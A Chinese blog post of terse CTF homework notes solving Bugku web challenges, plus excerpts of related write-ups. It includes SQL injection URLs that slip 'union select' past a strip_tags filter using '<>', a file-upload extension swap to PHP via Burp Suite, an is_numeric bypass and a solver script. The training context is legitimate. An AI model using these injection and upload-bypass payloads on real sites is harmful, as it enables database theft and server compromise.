每日作业

最新推荐文章于 2019-03-06 13:09:30 发布
最新推荐文章于 2019-03-06 13:09:30 发布
阅读量386 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39936993/article/details/79153989
版权

一, 签到题

直接进群看公告

 

二,

  打开是这样的

发现flag直接摆着了

 

 

 

 

 

  抓包看看,上传的时候,在burpsuit中把后缀.jpg改成.php。

 

 

 

这道题一开始发现只能输一个数字,检查网页源代码,看不出什么名堂来,只是验证了只能输一个数 。然后没嘛思路,把网页源代码上能点的链接都点了,看到了js函数

Flag就找到了

 

 直接what=flag

 

 

 


 

 七.

is_numeric函数的绕过

num是数字的话就会输出这个数字,但是只有$num==1才会输出flag。令num=1q当第一个判断条件时,不会认为这是一个数字,会进行到第二个判断条件,会认为num=1 从而输出flag

 


 

查看网页源代码,得到一串符号的代码,网上找在线解码器

 

 

 Sql注入

  宽字节注入

http://blog.csdn.net/hw_henry2008/article/details/6736017

http://blog.csdn.net/wy_97/article/details/77389088




变量一

GLOBALS全局变量

 

 

 

 

 

本地包含

https://www.cnblogs.com/f3ngt1ng/p/6374983.html

 

 

 

Sql注入

strip_tags()函数剥去字符串中的 HTML、XML 以及 PHP 的标签。

注释:该函数始终会剥离 HTML注释。这点无法通过 allow 参数改变。

注释:该函数是二进制安全的。

明白了这个函数的作用就简单了 这个函数会剥离html标签 所以我们只用写注入语句时加入html标签就可以绕过注入检测

 

注入语句

  http://103.238.227.13:10087/index.php?id=1 union select 1,2%23  其中的union和select是敏感关键字

所以在这两个词里面加入<>

1.  http://103.238.227.13:10087/index.php?id=1%20uni%3C%3Eon%20sele%3C%3Ect%201,2%23

2.  http://103.238.227.13:10087/index.php?id=1%20uni%3C%3Eon%20sele%3C%3Ect%20database(),2%23

3.http://103.238.227.13:10087/index.phpid=1%20uni%3C%3Eon%20sele%3C%3Ect%20hash,2%20fro%3C%3Em%20sql3.key%23

 

 

 

 

必须停下来

 

 抓包就可以了,很多次,差点就要放弃了



秋明山老司机

进入会看见这个界面

没刷新一次都会改变

用python构造脚本如下

#-*-coding:utf-8-*-
import requests
import re
url='http://120.24.86.145:8002/qiumingshan/'
r=requests.session()
requestpage = r.get(url)
ans=re.findall('<div>(.*?)=?;</div>',requestpage.text)#获取表达式,我正则写的好像有点问题,多匹配了最后的=?两个字符
ans="".join(ans)#列表转为字符串
ans=ans[:-2]#去掉最后的=?
post=eval(ans)#计算表达式的值
data={'value':post}#构造post的data部分
flag=r.post(url,data=data)
print(flag.text)


http://blog.csdn.net/eustiasora/article/details/79142835

摊煎饼
关注
python每日作业.zip
06-14
"Python每日作业"这个标题暗示了这可能是一个学习资源包,包含了用于日常练习或教学的Python代码示例。文件列表中的"zgl_resource"可能是资源文件夹或者一个特定的Python文件,面可能包含了各种函数、类或者问题...
bugku web 17~24 write up
h0ryit的博客
05-05 1798
bugku web 17~24 write up flagindex 打开页面有一个链接,点击链接发现url栏出现file,关键字想到文件包含漏洞。 关于文件包含漏洞的学习可以参考链接:https://zhuanlan.zhihu.com/p/25069779 直接修改file参数:http://120.24.86.145:8005/post/index.php?file=inde...
CTF-练习平台 Web writeup By Assassin [暂时完结]
热门推荐
Assassin
04-06 7万+
签到题 web2 文件上传测试经典的题目,用burp抓包得到如下 然后我们更改一下上传路径然后用%00截断一下即可Content-Disposition: form-data; name="file"; filename="3.png%001.php"计算题改一下浏览器中的text的长度Web3进去一直弹框,没完没了…直接禁用了F12看源码,发现有一个<!--KEY&#
CTF-练习平台部分writeup
hijack89的博客
04-03 4万+
CTF-练习平台writeupCTF-练习平台MISC滴答~滴看标题基本就知道是摩尔斯密码“.”、”-“,直接在线摩尔斯解密 聪明的小羊小羊。。。老套路 翻栅栏,栅栏密码。。。比较简单,直接看出来是两栏加密 KEY{sad23jjdsa2}这是一张单纯的图片??看题目估计是道隐写术的题,先保存图片的说; 30分的题,估计不会太难,直接文本编辑器打开;文本末尾发现了一行转义序列: 看来这
秋名山老司机(详解)——bugku
weixin_33862041的博客
07-16 1244
刚刚做了bugku的题目,现在整理一下 写出解题思路,希望能够帮助到那些需要帮助的人 所有的wp都是以一题一篇的形式写出 主要是为了能够让读者更好的阅读以及查找, 希望你们不要责怪!!共勉!!! Challenge 441 Solves 秋名山老司机 100 http://120.24.86.145:8002/qiumingshan...
flagindex,php://filter协议
wssmiss的博客
03-06 752
题目连接http://123.206.87.240:8005/post/ 题目 点击之后出现 地址栏:http://123.206.87.240:8005/post/index.php?file=show.php 观察此题的切入点应该在文件包含漏洞,而且是php ...
每日作业卷2
08-08
每日作业卷2】涉及的知识点主要集中在数据库事务处理和Java编程中的事务管理,特别是在银行业务场景下的转账操作。以下是这些知识点的详细解释: **1. MySQL中的事务操作** 在MySQL中,事务是用于管理数据库操作...
Java基础_第二阶段-day18每日作业卷答案1
08-08
【Java基础】BeanUtils工具类详解 在Java开发中,BeanUtils工具类是Apache Commons库中的一个组件,它提供了一种方便的方式来操作JavaBean的属性,简化了对象属性的设置和获取。本篇将深入讲解BeanUtils工具类的...
基于Vue的每日作业提交系统设计源码
最新发布
03-29
这是一个基于Vue的每日作业提交系统设计,使用JavaScript、Vue和HTML语言开发,包含98个文件。主要文件类型包括39个JavaScript文件、25个Vue文件、11个SVG文件、6个SCSS文件、2个YAML文件、2个Markdown文档、2个JSON...
Bugku CTF flag.php WriteUp
Ta_ki
03-18 9015
Bugku CTF flag.php WriteUp 原题链接 flag.php 进去后第一反应是SQL注入得到flag,但是发现输入任何特殊字符点击Login都没有反应,查看源代码未发现异样。回到Bugku CTF界面,发现给了一个hint 提示给了一个hint,用户名密码输入hint没有反应,突然想到Get传参,传入参数 120.24.86.145:8002/flagph...
Bugku - 秋名山老司机
多崎巡礼的博客
08-26 5072
  emm鬼算得出来。。。   import re import requests s = requests.Session() r = s.get("http://120.24.86.145:8002/qiumingshan/") searchObj = re.search(r'^&lt;div&gt;(.*)=\?;&lt;/div&gt;$', r.text, re.M | r...
老司机谈怎做一个优秀的自动化测试人员
piooix的博客
11-17 486
随着这几年国内IT行业的快速发展,特别是移动互联网,很多传统行业纷纷进入,各种各样的app,种内繁多的手游,测试已经不在限制与传统的软件和硬件,测试这一职位也越来越受到企业的重视,需求量越来越大,但是测试人才却存在巨大的缺口。   在早期,大多对测试人员的能力要求较低,导致人们的认知都是:门槛低、水平低,能轻松胜任。而自动化测试,作为进阶,在没有打牢测试基础的情况下,即使写出脚本来也根本不能解
BugkuCTF(web wp)
Xi4or0uji
08-25 4308
web2 源码就有flag 文件上传测试 服务器挂了兼忘了当初怎么做了(捂脸 计算器 这题是要你计算一个数学公式的答案,但是发现只能输一个数字,改下maxlength,然后就能输入就有flag了 web基础$_GET 这题其实考get方法传参,get方法发个flag,payload:?what=flag web基础$_POST post方法传参 矛盾 这题要传一个num,...
bugkuCTF Writeup (Web)31-35
Troublor的博客
01-31 1778
各种绕过哟 代码审计 highlight_file('flag.php'); $_GET['id'] = urldecode($_GET['id']); $flag = 'flag{xxxxxxxxxxxxxxxxxx}'; if (isset($_GET['uname']) and isset($_POST['passwd'])) { if ($_GET['una
Bugku-web题wp (持续更新)
Risker
03-14 1431
分享一下本人做题记录,不足之处多多指正。Sql注入1:看代码一个循环把select,from,where都给过滤了…要查肯定要用这些语句啊,对怎么绕过毫无思路,只好去网上查,才知道底下xss不是白给的,在关键词中间加html的标记&lt;&gt;,xss的时候再还原回去(知道了一个新套路…)要求查询key表id=1的hash字段,所以提交?id=1 un&lt;br&gt;ion sel&lt;b...
bugkuCTF Writeup (Web)15-21
Troublor的博客
01-25 4802
Web4 看源代码,一大堆东西解码,发现eval执行的是: function checkSubmit() { var a = document.getElementById("password"); if ("undefined" != typeof a) { if ("67d709b2b54aa2aa648cf6e87a7114f1" == a.val
BUGKU web--writeup
Sanky0u的博客
08-15 1万+
因为已经看到过很多关于bugku平台上面web题的writeup,我想自己就不需要每道题都写了,只写自己比较有收获的几题的writeup,并且将自己收集到的好几种解法都放上来。1. 文件上传测试这道题提示上传php文件,但选择php文件上传的时候又提示非图片文件。解法1:将一个php文件的后缀名改成.php.jpg或者.php.png,然后选择这个文件,点击上传的时候用burpsuite抓包,改文件
Bugku:flagindex
foreverzwl
10-22 1768
php文件包含漏洞
Bugku-变量1之浅谈超全局变量 $GLOBALS
Au
03-19 2764
Bugku 变量一 链接:http://120.24.86.145:8004/index1.php 代码审计 代表关闭报错提示 包含文件 flag1.php 对文件进行语法高亮显示 条件判断 get方法传递的args参数是否存在存在为真 赋值给变量 $args 正则表达式判断 正则表达式格式 为:开头 /^ ...
JavaSE接口与多态学习:每日作业解析
作业涵盖了接口的成员特点、对象创建、多态的理解和接口的实现等实际编程场景。" 在Java编程中,接口(Interface)扮演着重要的角色,它是一种完全抽象的类型,用于定义一类对象的行为。接口中的成员特点如下: 1....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值